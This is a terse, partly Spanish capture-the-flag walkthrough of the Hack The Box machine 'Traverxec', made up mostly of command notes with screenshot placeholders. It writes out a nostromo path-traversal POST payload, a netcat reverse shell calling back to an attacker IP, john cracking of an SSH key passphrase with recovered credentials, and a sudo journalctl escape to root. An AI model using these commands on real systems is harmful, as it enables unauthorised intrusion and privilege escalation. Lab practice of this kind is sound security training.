nmap -A -p- -oA output 10.129.1.193 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA traverxec 10.129.1.193

nmap -sU -O -p- -oA traverxec-udp 10.129.1.193

nikto -h 10.129.159.31:80

Pasted image 20220126065649.png

Pasted image 20220126065748.png

whatweb http://10.129.1.193

Pasted image 20220126065814.png

http://10.129.1.193/

Pasted image 20220126065632.png

searchsploit nostromo 1.9.6

searchsploit -m 47837

cat 47837.py

Pasted image 20220126070544.png

telnet 10.129.1.193

POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0

Content-Length: 1

nc -e /bin/bash 10.10.14.135 443

Pasted image 20220126071509.png

script /dev/null -c bash Despues hacer un ctrl Z stty raw -echo; fg reset El terminal type es: xterm export TERM=xterm export SHELL=bash stty rows 44 columns 187

Pasted image 20220126072708.png

john --wordlist=/usr/share/worldlists/rockyou.txt hash

Pasted image 20220126073838.png

http://10.129.1.193/david/protected-file-area

Pasted image 20220126074329.png

Bajamos el archivo

Pasted image 20220126074419.png

tar -xvf backup-ssh-identity-files.tgz

cd home/david/.ssh

cat id_rsa

Pasted image 20220126074712.png

john --wordlist=/usr/share/worldlists/rockyou.txt hash

Conseguimos las credenciales-> david:hunter

ssh id_rsa david@10.129.1.193

Pasted image 20220126074921.png

ls -al

cd bin

cat server-stats.sh

Pasted image 20220126075215.png

Vemos que usa journalctl

https://gtfobins.github.io/gtfobins/journalctl/

Pasted image 20220126075358.png

Reducimos el tama~o de la ventana

/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service

!/bin/bash

Pasted image 20220126080331.png

boxes

copyright©2022 Cu3rv0x all rights reserved